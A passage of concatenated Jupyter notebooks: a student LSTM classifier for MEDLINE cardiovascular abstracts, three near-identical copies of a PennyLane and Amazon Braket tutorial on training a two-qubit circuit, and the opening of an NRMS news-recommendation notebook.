8346/8346 [==============================] - 26s 3ms/step - loss: 2.3287 - categorical_accuracy: 0.2810 - val_loss: 2.7948 - val_categorical_accuracy: 0.2123
Epoch 7/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.2461 - categorical_accuracy: 0.2994 - val_loss: 2.8336 - val_categorical_accuracy: 0.2262
Epoch 8/10
8346/8346 [==============================] - 27s 3ms/step - loss: 2.1643 - categorical_accuracy: 0.3229 - val_loss: 3.0127 - val_categorical_accuracy: 0.2137
Epoch 9/10
8346/8346 [==============================] - 27s 3ms/step - loss: 2.0885 - categorical_accuracy: 0.3379 - val_loss: 2.9886 - val_categorical_accuracy: 0.1931
Epoch 10/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.0305 - categorical_accuracy: 0.3569 - val_loss: 3.0541 - val_categorical_accuracy: 0.1888
Elapsed time: 266.94 seconds
###Markdown
Case 3. Medical text categorization Joona Klemetti 10.3.2018 Cognitive Systems for Health Technology Applications Helsinki Metropolia University of Applied Science 1. Objectives The aim of this case is to use recurrent and convolutional neural networks to create a classifier for a collection of medical abstracts extracted from MEDLINE, the online medical information database. 2. Required libraries At first it is necessary to import all libraries. In this assignment is used os module to downloading and listing data and labels, time library to comput the time, numpy to scientific computing and creating multidimensional arrays, Keras to preproces data, define labels, building and training the model, matplotlib to ploting history and sklearn to calculate metrics.
###Code
import os
import time
import numpy as np
import matplotlib.pyplot as plt
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils.np_utils import to_categorical
from keras.models import Sequential
from keras.layers import Dense, Embedding, LSTM
from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix
from sklearn.metrics import classification_report, recall_score
###Output
Using TensorFlow backend.
###Markdown
3. Data description and preprocessing The data used in this case is the Cardiovascular diseases abstract database from MEDLINE. The data is already splited into training and test sets and abstracts are in sub-folders according to their categories. The data is downloaded from http://disi.unitn.it/moschitti/corpora.htm. Visit there if you want more information of used abstracts. For more infrormation of labels please visit http://disi.unitn.it/moschitti/corpora/First-Level-Categories-of-Cardiovascular-Disease.txt At first medical abstracts and labels are downloaded. After that abstracts is collected into lsit of strings. Labels is also collected to the labels list. Next the data is tokenized, maxium length of text and number of words is defined. Data is also shaped into right shape and shuffled. Shuffeling is important because otherwise there will be problems when spliting data into training and validation set. Without shuffling validation set consists only abstracts from last two categories.
###Code
ohsumed_dir = 'ohsumed-first-20000-docs'
train_dir = os.path.join(ohsumed_dir, 'training')
labels = []
texts = []
t1 = time.time()
# Generate a list L = ['C01', 'C02, ..., 'C023']
L = ['C{:02}'.format(n) for n in range(1, 23 + 1)]
for label_type in L:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
texts.append(f.read())
f.close()
i = L.index(label_type)
labels.append(i)
t2 = time.time()
print('Time elapsed {:.0f} seconds.'.format((t2-t1)))
maxlen = 250
max_words = 20000
tokenizer = Tokenizer(num_words = max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
print('Found %s unique tokens' % len(word_index))
data = pad_sequences(sequences, maxlen = maxlen)
labels = np.asarray(labels)
one_hot_labels = to_categorical(labels)
print('Shape of data tensor:', data.shape)
print('Shape of labels tensor:', one_hot_labels.shape)
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
one_hot_labels = one_hot_labels[indices]
###Output
_____no_output_____
###Markdown
3. Building the model The recurrent neural network is build by using keras sequential model. The first layer, Embedding layer, is turned positive integers to dense vectors. After Embedding layer there is two LSTM recurrent layers with dropout and recurrent_dropout arguments to avoid overfitting. LSTM is abbreviation for long short-term memory and it is founded in 1997. At least there is dense layer with softmax activation to split data to the 23 categories.
###Code
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(LSTM(100, return_sequences = True, dropout = 0.4, recurrent_dropout = 0.2))
model.add(LSTM(100, dropout = 0.2, recurrent_dropout = 0.4))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_1 (Embedding) (None, 250, 32) 640000
_________________________________________________________________
lstm_1 (LSTM) (None, 250, 100) 53200
_________________________________________________________________
lstm_2 (LSTM) (None, 100) 80400
_________________________________________________________________
dense_1 (Dense) (None, 23) 2323
=================================================================
Total params: 775,923
Trainable params: 775,923
Non-trainable params: 0
_________________________________________________________________
###Markdown
5. Training and ValidationAfter model is build is time to train and validate the network. Training is executed with .fit() method. Validation split is defined by validation_split argument.
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 20,
batch_size = 34,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/20
8346/8346 [==============================] - 194s 23ms/step - loss: 2.8224 - acc: 0.1691 - val_loss: 2.7976 - val_acc: 0.1624
Epoch 2/20
8346/8346 [==============================] - 186s 22ms/step - loss: 2.7106 - acc: 0.1913 - val_loss: 2.6602 - val_acc: 0.2142
Epoch 3/20
8346/8346 [==============================] - 193s 23ms/step - loss: 2.6165 - acc: 0.2153 - val_loss: 2.6487 - val_acc: 0.2113
Epoch 4/20
8346/8346 [==============================] - 187s 22ms/step - loss: 2.5576 - acc: 0.2360 - val_loss: 2.6529 - val_acc: 0.2209
Epoch 5/20
8346/8346 [==============================] - 192s 23ms/step - loss: 2.5092 - acc: 0.2574 - val_loss: 2.6790 - val_acc: 0.2520
Epoch 6/20
8346/8346 [==============================] - 189s 23ms/step - loss: 2.4818 - acc: 0.2644 - val_loss: 2.6024 - val_acc: 0.2401
Epoch 7/20
8346/8346 [==============================] - 194s 23ms/step - loss: 2.3878 - acc: 0.2872 - val_loss: 2.5972 - val_acc: 0.2444
Epoch 8/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.3268 - acc: 0.2970 - val_loss: 2.6065 - val_acc: 0.2420
Epoch 9/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.2854 - acc: 0.3132 - val_loss: 2.6033 - val_acc: 0.2487
Epoch 10/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.2471 - acc: 0.3160 - val_loss: 2.6121 - val_acc: 0.2463
Epoch 11/20
8346/8346 [==============================] - 196s 23ms/step - loss: 2.2111 - acc: 0.3245 - val_loss: 2.6331 - val_acc: 0.2472
Epoch 12/20
8346/8346 [==============================] - 200s 24ms/step - loss: 2.1891 - acc: 0.3308 - val_loss: 2.6434 - val_acc: 0.2540
Epoch 13/20
8346/8346 [==============================] - 207s 25ms/step - loss: 2.1616 - acc: 0.3353 - val_loss: 2.6625 - val_acc: 0.2568
Epoch 14/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.1322 - acc: 0.3464 - val_loss: 2.6689 - val_acc: 0.2468
Epoch 15/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.1094 - acc: 0.3478 - val_loss: 2.6731 - val_acc: 0.2549
Epoch 16/20
8346/8346 [==============================] - 184s 22ms/step - loss: 2.0733 - acc: 0.3641 - val_loss: 2.7383 - val_acc: 0.2405
Epoch 17/20
8346/8346 [==============================] - 183s 22ms/step - loss: 2.0614 - acc: 0.3603 - val_loss: 2.7417 - val_acc: 0.2329
Epoch 18/20
8346/8346 [==============================] - 182s 22ms/step - loss: 2.0326 - acc: 0.3731 - val_loss: 2.7400 - val_acc: 0.2329
Epoch 19/20
8346/8346 [==============================] - 200s 24ms/step - loss: 2.0061 - acc: 0.3843 - val_loss: 2.7695 - val_acc: 0.2367
Epoch 20/20
8346/8346 [==============================] - 182s 22ms/step - loss: 1.9740 - acc: 0.3874 - val_loss: 2.7523 - val_acc: 0.2386
Elapsed time: 3787.94 seconds
###Markdown
6. Evaluation Model is tested with testing set. Evaluate function computes testing sets loss function and accuracity.
###Code
# Download and preproces test data
test_dir = os.path.join(ohsumed_dir, 'test')
test_labels = []
test_texts = []
for label_type in L:
dir_name = os.path.join(test_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
test_texts.append(f.read())
f.close()
i = L.index(label_type)
test_labels.append(i)
test_sequences = tokenizer.texts_to_sequences(test_texts)
x_test = pad_sequences(test_sequences, maxlen=maxlen)
test_labels = np.asarray(test_labels)
y_test = to_categorical(test_labels)
#Evaluate model with test data
model.evaluate(x_test, y_test)
###Output
12733/12733 [==============================] - 66s 5ms/step
###Markdown
7. Results and DiscussionThere is noticed overfitting in the model and despite to dropout arguments it stil bother the network. Overfitting could be seen from lower testing accuracy and higher loss. It is interesting that testing accuracy and loss are much better than validation results. Like you could see from the graphs overfitting started about after 6th epoch.
###Code
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.figure(figsize=(15, 3))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.figure(figsize=(15, 3))
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
8. Metrics results Metrics are calulate by sklearn library. There are classification report, confusion matrix and possibility to check predictions by text.
###Code
# Calculate the predictions
predictions = model.predict(data)
y_pred = np.argmax(predictions, axis = 1)
# Classification results per class
print(classification_report(labels, y_pred))
# Confusion matrix
cm = confusion_matrix(labels, y_pred)
print(np.array2string(cm, max_line_width = 120))
predict_text=503
print(texts[indices[predict_text]])
print('True class: ', labels[predict_text])
print('Predicted class:', y_pred[predict_text])
print('Predictions per class:')
print(np.array2string(predictions[predict_text], precision = 2))
plt.stem(predictions[predict_text])
plt.show()
###Output
True class: 22
Predicted class: 22
Predictions per class:
[ 0.01 0. 0. 0.03 0.01 0.06 0. 0.01 0. 0.19 0. 0.03
0.01 0.14 0.01 0.03 0.01 0.01 0. 0. 0.02 0. 0.44]
|
examples/pennylane/0_Getting_started.ipynb | ###Markdown
*fffffeeeeddddd* Combining PennyLane with Amazon Braket What is PennyLane? PennyLane is a Python library for differentiable programming of quantum computers, allowing you to train a quantum computer the same way as a neural network.  PennyLane integrates with Amazon Braket to add additional features for quantum machine learning and optimization. This introductory tutorial walks you through how to train a quantum circuit using Amazon Braket simulators and PennyLane's automatic differentiation capabilities. Setup PennyLane is already installed on Braket notebook instances. On a local machine, PennyLane can be installed by following [these](https://pennylane.ai/install.html) instructions. It can then be imported with:
###Code
import pennylane as qml
from pennylane import numpy as np
###Output
_____no_output_____
###Markdown
To use Braket as a backend in PennyLane, we have to create a PennyLane device. Here we will first create a device that uses the local Braket simulator that runs on your local laptop (or on the server that hosts this notebook).
###Code
wires = 2 # Number of qubits
dev = qml.device("braket.local.qubit", wires=wires)
###Output
_____no_output_____
###Markdown
Below we will also show you how to scale out simulations to the AWS cloud. Defining a circuit We will choose a simple two-qubit circuit with two controllable rotations and a CNOT gate.
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
###Output
_____no_output_____
###Markdown
The ``qml.qnode(dev)`` decorator binds the circuit to the local Braket device. Now, every time that ``circuit()`` is called, the quantum computation defined in the function above will be executed with Braket. Note PennyLane also supports automatic differentiation with PyTorch and TensorFlow interfaces. The choice of interface can be specified using:@qml.qnode(dev, interface="<interface>"). Evaluating the circuit and accessing its gradient Let's set some values for our controllable parameters:
###Code
params = np.array([0.1, 0.2])
###Output
_____no_output_____
###Markdown
The circuit can be evaluated with these parameters using
###Code
print("Expectation value of circuit:", circuit(params))
print("Drawing of circuit:\n")
print(circuit.draw())
###Output
Drawing of circuit:
0: ──RX(0.1)──╭C──┤
1: ──RY(0.2)──╰X──┤ ⟨Z⟩
###Markdown
A crucial element of machine learning and optimization is accessing the gradient of a model with respect to its parameters. This functionality is built into PennyLane:
###Code
dcircuit = qml.grad(circuit)
###Output
_____no_output_____
###Markdown
Here, ``dcircuit`` is a callable function that evaluates the gradient of the circuit, i.e., its partial derivatives with respect to the controllable parameters.
###Code
dcircuit(params)
###Output
_____no_output_____
###Markdown
Training the circuit Suppose we now want to minimize the output of the circuit by updating its parameters. This can be done using gradient-based optimization.First, an optimizer is fixed:
###Code
opt = qml.GradientDescentOptimizer(stepsize=0.2)
###Output
_____no_output_____
###Markdown
The next step is to run the optimizer for a chosen number of iterations:
###Code
iterations = 50
costs = []
for i in range(iterations):
params, cost = opt.step_and_cost(circuit, params)
costs.append(cost)
# Visualize results
import matplotlib.pyplot as plt
costs.append(circuit(params))
plt.plot(costs)
plt.xlabel("Iterations")
plt.ylabel("Cost")
print("Minimized circuit output:", circuit(params))
print("Optimized parameters:", params)
###Output
Minimized circuit output: -0.9999996577749632
Optimized parameters: [4.19618503e-04 3.14087965e+00]
###Markdown
Note The circuit considered here is very simple and can be optimized easily by hand. However, the need for PennyLane's automatic differentiation capabilities becomes apparent as we make the problem more complicated, e.g., with more gates and different types of output measurement. In later demos, we will also see how Braket can be used to parallelize evaluation of the gradient, providing a turbocharger for quantum circuit training in PennyLane. Running circuits on Braket's managed simulator, SV1 So far we have used the local Braket simulator. This is a great choice for quick prototyping, but it is not suitable for large circuits with many qubits and does not provide a connection to quantum hardware.Amazon Braket also provides access to fully managed, high-performance simulators and quantum processing units (QPUs) from different [providers](https://aws.amazon.com/braket/hardware-providers/). These devices can be accessed through PennyLane by changing a single line of code, unlocking the potential for machine learning and optimization on quantum hardware and high performance simulators!Each remote Braket device can be selected through its [ARN](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html). The supported devices on Braket are listed [here](https://docs.aws.amazon.com/braket/latest/developerguide/braket-devices.html). For now, we will pick the managed SV1 simulator. Caution: Running hybrid algorithms on a QPU can take a long time and incur high usage fees charged to your AWS account.
###Code
device_arn = "arn:aws:braket:::device/quantum-simulator/amazon/sv1"
###Output
_____no_output_____
###Markdown
We also need to choose an S3 folder to store the device-execution results:
###Code
# Please enter the S3 bucket you created during onboarding
# (or any other S3 bucket starting with 'amazon-braket-' in your account) in the code below
my_bucket = f"amazon-braket-Your-Bucket-Name" # the name of the bucket
my_prefix = "Your-Folder-Name" # the name of the folder in the bucket
s3_folder = (my_bucket, my_prefix)
###Output
_____no_output_____
###Markdown
In PennyLane, all remote Braket devices are then accessed through a single PennyLane device named ``braket.aws.qubit``.
###Code
dev = qml.device('braket.aws.qubit', device_arn=device_arn, wires=2, s3_destination_folder=s3_folder)
###Output
_____no_output_____
###Markdown
A follow up [tutorial](./1_Parallelized_optimization_of_quantum_circuits.ipynb) shows you how to use the remote device to run multiple circuits in parallel, while the [QAOA tutorial](./2_Graph_optimization_with_QAOA.ipynb) takes a deeper dive into graph optimization, including using SV1 to optimize a 20-node graph. Let's execute our circuit on SV1, as well as calculating the gradient:
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
dcircuit = qml.grad(circuit)
print("Result of circuit run on SV1:", circuit(params))
print("Result of gradient calculation on SV1:", dcircuit(params))
###Output
Result of circuit run on SV1: -0.9999996577749632
Result of gradient calculation on SV1: (array([ 0.00041962, -0.000713 ]),)
###Markdown
Combining PennyLane with Amazon Braket What is PennyLane? PennyLane is a Python library for differentiable programming of quantum computers, allowing you to train a quantum computer the same way as a neural network.  PennyLane integrates with Amazon Braket to add additional features for quantum machine learning and optimization. This introductory tutorial walks you through how to train a quantum circuit using Amazon Braket simulators and PennyLane's automatic differentiation capabilities. Setup PennyLane is already installed on Braket notebook instances. On a local machine, PennyLane can be installed by following [these](https://pennylane.ai/install.html) instructions. It can then be imported with:
###Code
import pennylane as qml
from pennylane import numpy as np
###Output
_____no_output_____
###Markdown
To use Braket as a backend in PennyLane, we have to create a PennyLane device. Here we will first create a device that uses the local Braket simulator that runs on your local laptop (or on the server that hosts this notebook).
###Code
wires = 2 # Number of qubits
dev = qml.device("braket.local.qubit", wires=wires)
###Output
_____no_output_____
###Markdown
Below we will also show you how to scale out simulations to the AWS cloud. Defining a circuit We will choose a simple two-qubit circuit with two controllable rotations and a CNOT gate.
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
###Output
_____no_output_____
###Markdown
The ``qml.qnode(dev)`` decorator binds the circuit to the local Braket device. Now, every time that ``circuit()`` is called, the quantum computation defined in the function above will be executed with Braket. Note PennyLane also supports automatic differentiation with PyTorch and TensorFlow interfaces. The choice of interface can be specified using:@qml.qnode(dev, interface="<interface>"). Evaluating the circuit and accessing its gradient Let's set some values for our controllable parameters:
###Code
params = np.array([0.1, 0.2], requires_grad=True)
###Output
_____no_output_____
###Markdown
The circuit can be evaluated with these parameters using
###Code
print("Expectation value of circuit:", circuit(params))
print("Drawing of circuit:\n")
print(qml.draw(circuit)(params))
###Output
Drawing of circuit:
0: ──RX(0.1)──╭C──┤
1: ──RY(0.2)──╰X──┤ ⟨Z⟩
###Markdown
A crucial element of machine learning and optimization is accessing the gradient of a model with respect to its parameters. This functionality is built into PennyLane:
###Code
dcircuit = qml.grad(circuit)
###Output
_____no_output_____
###Markdown
Here, ``dcircuit`` is a callable function that evaluates the gradient of the circuit, i.e., its partial derivatives with respect to the controllable parameters.
###Code
dcircuit(params)
###Output
_____no_output_____
###Markdown
Training the circuit Suppose we now want to minimize the output of the circuit by updating its parameters. This can be done using gradient-based optimization.First, an optimizer is fixed:
###Code
opt = qml.GradientDescentOptimizer(stepsize=0.2)
###Output
_____no_output_____
###Markdown
The next step is to run the optimizer for a chosen number of iterations:
###Code
iterations = 50
costs = []
for i in range(iterations):
params, cost = opt.step_and_cost(circuit, params)
costs.append(cost)
# Visualize results
import matplotlib.pyplot as plt
costs.append(circuit(params))
plt.plot(costs)
plt.xlabel("Iterations")
plt.ylabel("Cost")
print("Minimized circuit output:", circuit(params))
print("Optimized parameters:", params)
###Output
Minimized circuit output: -0.9999996577749632
Optimized parameters: [4.19618503e-04 3.14087965e+00]
###Markdown
Note The circuit considered here is very simple and can be optimized easily by hand. However, the need for PennyLane's automatic differentiation capabilities becomes apparent as we make the problem more complicated, e.g., with more gates and different types of output measurement. In later demos, we will also see how Braket can be used to parallelize evaluation of the gradient, providing a turbocharger for quantum circuit training in PennyLane. Running circuits on Braket's managed simulator, SV1 So far we have used the local Braket simulator. This is a great choice for quick prototyping, but it is not suitable for large circuits with many qubits and does not provide a connection to quantum hardware.Amazon Braket also provides access to fully managed, high-performance simulators and quantum processing units (QPUs) from different [providers](https://aws.amazon.com/braket/hardware-providers/). These devices can be accessed through PennyLane by changing a single line of code, unlocking the potential for machine learning and optimization on quantum hardware and high performance simulators!Each remote Braket device can be selected through its [ARN](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html). The supported devices on Braket are listed [here](https://docs.aws.amazon.com/braket/latest/developerguide/braket-devices.html). For now, we will pick the managed SV1 simulator. Caution: Running hybrid algorithms on a QPU can take a long time and incur high usage fees charged to your AWS account.
###Code
device_arn = "arn:aws:braket:::device/quantum-simulator/amazon/sv1"
###Output
_____no_output_____
###Markdown
In PennyLane, all remote Braket devices are then accessed through a single PennyLane device named ``braket.aws.qubit``.
###Code
dev = qml.device('braket.aws.qubit', device_arn=device_arn, wires=2)
###Output
_____no_output_____
###Markdown
A follow up [tutorial](./1_Parallelized_optimization_of_quantum_circuits.ipynb) shows you how to use the remote device to run multiple circuits in parallel, while the [QAOA tutorial](./2_Graph_optimization_with_QAOA.ipynb) takes a deeper dive into graph optimization, including using SV1 to optimize a 20-node graph. Let's execute our circuit on SV1, as well as calculating the gradient:
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
dcircuit = qml.grad(circuit)
print("Result of circuit run on SV1:", circuit(params))
print("Result of gradient calculation on SV1:", dcircuit(params))
###Output
Result of circuit run on SV1: -0.9999996577749632
Result of gradient calculation on SV1: (array([ 0.00041962, -0.000713 ]),)
###Markdown
Combining PennyLane with Amazon Braket What is PennyLane? PennyLane is a Python library for differentiable programming of quantum computers, allowing you to train a quantum computer the same way as a neural network.  PennyLane integrates with Amazon Braket to add additional features for quantum machine learning and optimization. This introductory tutorial walks you through how to train a quantum circuit using Amazon Braket simulators and PennyLane's automatic differentiation capabilities. Setup PennyLane is already installed on Braket notebook instances. On a local machine, PennyLane can be installed by following [these](https://pennylane.ai/install.html) instructions. It can then be imported with:
###Code
import pennylane as qml
from pennylane import numpy as np
###Output
_____no_output_____
###Markdown
To use Braket as a backend in PennyLane, we have to create a PennyLane device. Here we will first create a device that uses the local Braket simulator that runs on your local laptop (or on the server that hosts this notebook).
###Code
wires = 2 # Number of qubits
dev = qml.device("braket.local.qubit", wires=wires)
###Output
_____no_output_____
###Markdown
Below we will also show you how to scale out simulations to the AWS cloud. Defining a circuit We will choose a simple two-qubit circuit with two controllable rotations and a CNOT gate.
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
###Output
_____no_output_____
###Markdown
The ``qml.qnode(dev)`` decorator binds the circuit to the local Braket device. Now, every time that ``circuit()`` is called, the quantum computation defined in the function above will be executed with Braket. Note PennyLane also supports automatic differentiation with PyTorch and TensorFlow interfaces. The choice of interface can be specified using:@qml.qnode(dev, interface="<interface>"). Evaluating the circuit and accessing its gradient Let's set some values for our controllable parameters:
###Code
params = np.array([0.1, 0.2])
###Output
_____no_output_____
###Markdown
The circuit can be evaluated with these parameters using
###Code
print("Expectation value of circuit:", circuit(params))
print("Drawing of circuit:\n")
print(circuit.draw())
###Output
Drawing of circuit:
0: ──RX(0.1)──╭C──┤
1: ──RY(0.2)──╰X──┤ ⟨Z⟩
###Markdown
A crucial element of machine learning and optimization is accessing the gradient of a model with respect to its parameters. This functionality is built into PennyLane:
###Code
dcircuit = qml.grad(circuit)
###Output
_____no_output_____
###Markdown
Here, ``dcircuit`` is a callable function that evaluates the gradient of the circuit, i.e., its partial derivatives with respect to the controllable parameters.
###Code
dcircuit(params)
###Output
_____no_output_____
###Markdown
Training the circuit Suppose we now want to minimize the output of the circuit by updating its parameters. This can be done using gradient-based optimization.First, an optimizer is fixed:
###Code
opt = qml.GradientDescentOptimizer(stepsize=0.2)
###Output
_____no_output_____
###Markdown
The next step is to run the optimizer for a chosen number of iterations:
###Code
iterations = 50
costs = []
for i in range(iterations):
params, cost = opt.step_and_cost(circuit, params)
costs.append(cost)
# Visualize results
import matplotlib.pyplot as plt
costs.append(circuit(params))
plt.plot(costs)
plt.xlabel("Iterations")
plt.ylabel("Cost")
print("Minimized circuit output:", circuit(params))
print("Optimized parameters:", params)
###Output
Minimized circuit output: -0.9999996577749632
Optimized parameters: [4.19618503e-04 3.14087965e+00]
###Markdown
Note The circuit considered here is very simple and can be optimized easily by hand. However, the need for PennyLane's automatic differentiation capabilities becomes apparent as we make the problem more complicated, e.g., with more gates and different types of output measurement. In later demos, we will also see how Braket can be used to parallelize evaluation of the gradient, providing a turbocharger for quantum circuit training in PennyLane. Running circuits on Braket's managed simulator, SV1 So far we have used the local Braket simulator. This is a great choice for quick prototyping, but it is not suitable for large circuits with many qubits and does not provide a connection to quantum hardware.Amazon Braket also provides access to fully managed, high-performance simulators and quantum processing units (QPUs) from different [providers](https://aws.amazon.com/braket/hardware-providers/). These devices can be accessed through PennyLane by changing a single line of code, unlocking the potential for machine learning and optimization on quantum hardware and high performance simulators!Each remote Braket device can be selected through its [ARN](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html). The supported devices on Braket are listed [here](https://docs.aws.amazon.com/braket/latest/developerguide/braket-devices.html). For now, we will pick the managed SV1 simulator. Caution: Running hybrid algorithms on a QPU can take a long time and incur high usage fees charged to your AWS account.
###Code
device_arn = "arn:aws:braket:::device/quantum-simulator/amazon/sv1"
###Output
_____no_output_____
###Markdown
We also need to choose an S3 folder to store the device-execution results:
###Code
# Please enter the S3 bucket you created during onboarding
# (or any other S3 bucket starting with 'amazon-braket-' in your account) in the code below
my_bucket = f"amazon-braket-Your-Bucket-Name" # the name of the bucket
my_prefix = "Your-Folder-Name" # the name of the folder in the bucket
s3_folder = (my_bucket, my_prefix)
###Output
_____no_output_____
###Markdown
In PennyLane, all remote Braket devices are then accessed through a single PennyLane device named ``braket.aws.qubit``.
###Code
dev = qml.device('braket.aws.qubit', device_arn=device_arn, wires=2, s3_destination_folder=s3_folder)
###Output
_____no_output_____
###Markdown
A follow up [tutorial](./1_Parallelized_optimization_of_quantum_circuits.ipynb) shows you how to use the remote device to run multiple circuits in parallel, while the [QAOA tutorial](./2_Graph_optimization_with_QAOA.ipynb) takes a deeper dive into graph optimization, including using SV1 to optimize a 20-node graph. Let's execute our circuit on SV1, as well as calculating the gradient:
###Code
@qml.qnode(dev)
def circuit(params):
qml.RX(params[0], wires=0)
qml.RY(params[1], wires=1)
qml.CNOT(wires=[0, 1])
return qml.expval(qml.PauliZ(1))
dcircuit = qml.grad(circuit)
print("Result of circuit run on SV1:", circuit(params))
print("Result of gradient calculation on SV1:", dcircuit(params))
###Output
Result of circuit run on SV1: -0.9999996577749632
Result of gradient calculation on SV1: (array([ 0.00041962, -0.000713 ]),)
|
notebooks/00_quick_start/nrms_synthetic.ipynb | ###Markdown
Copyright (c) Microsoft Corporation. All rights reserved.Licensed under the MIT License. NRMS: Neural News Recommendation with Multi-Head Self-AttentionNRMS \[1\] is a neural news recommendation approach with multi-head selfattention. The core of NRMS is a news encoder and a user encoder. In the newsencoder, a multi-head self-attentions is used to learn news representations from news titles by modeling the interactions between words. In the user encoder, we learn representations of users from their browsed news and use multihead self-attention to capture the relatedness between the news. Besides, we apply additiveattention to learn more informative news and user representations by selecting important words and news. Properties of NRMS:- NRMS is a content-based neural news recommendation approach.- It uses multi-self attention to learn news representations by modeling the iteractions between words and learn user representations by capturing the relationship between user browsed news.- NRMS uses additive attentions to learn informative news and user representations by selecting important words and news. Data format: train dataOne simple example: `1 0 0 0 0 Impression:0 User:2903 CandidateNews0:27006,11901,21668,9856,16156,21390,1741,2003,16983,8164 CandidateNews1:8377,10423,9960,5485,20494,7553,1251,17232,4745,9178 CandidateNews2:1607,26414,25830,16156,15337,16461,4004,6230,17841,10704 CandidateNews3:17323,20324,27855,16156,2934,14673,551,0,0,0 CandidateNews4:7172,3596,25442,21596,26195,4745,17988,16461,1741,76 ClickedNews0:11362,8205,22501,9349,12911,20324,1238,11362,26422,19185 ...`In general, each line in data file represents one positive instance and n negative instances in a same impression. The format is like: `[label0] ... [labeln] [Impression:i] [User:u] [CandidateNews0:w1,w2,w3,...] ... [CandidateNewsn:w1,w2,w3,...] [ClickedNews0:w1,w2,w3,...] ...`It contains several parts seperated by space, i.e. label part, Impression part ``, User part ``, CandidateNews part, ClickedHistory part. CandidateNews part describes the target news article we are going to score in this instance, it is represented by (aligned) title words. To take a quick example, a news title may be : `Trump to deliver State of the Union address next week` , then the title words value may be `CandidateNewsi:34,45,334,23,12,987,3456,111,456,432`. ClickedNewsk describe the k-th news article the user ever clicked and the format is the same as candidate news. Words are aligned in news title. We use a fixed length to describe an article, if the title is less than the fixed length, just pad it with zeros. test dataOne simple example: `1 Impression:0 User:6446 CandidateNews0:18707,23848,13490,10948,21385,11606,1251,16591,827,28081 ClickedNews0:27838,7376,16567,28518,119,21248,7598,9349,20324,9349 ClickedNews1:7969,9783,1741,2549,27104,14669,14777,21343,7667,20324 ...`In general, each line in data file represents one instance. The format is like: `[label] [Impression:i] [User:u] [CandidateNews0:w1,w2,w3,...] [ClickedNews0:w1,w2,w3,...] ...` Global settings and imports
###Code
import sys
sys.path.append("../../")
from reco_utils.recommender.deeprec.deeprec_utils import download_deeprec_resources
from reco_utils.recommender.newsrec.newsrec_utils import prepare_hparams
from reco_utils.recommender.newsrec.models.nrms import NRMSModel
from reco_utils.recommender.newsrec.io.news_iterator import NewsIterator
import papermill as pm
from tempfile import TemporaryDirectory
import tensorflow as tf
import os
print("System version: {}".format(sys.version))
print("Tensorflow version: {}".format(tf.__version__))
tmpdir = TemporaryDirectory()
###Output
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:523: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_qint8 = np.dtype([("qint8", np.int8, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:524: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_quint8 = np.dtype([("quint8", np.uint8, 1)])
/data/anaconda/envs/reco_gpu/lib/python3.6/site-packages/tensorflow/python/framework/dtypes.py:525: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
_np_qint16 = np.dtype([("qint16", np.int16, 1)])
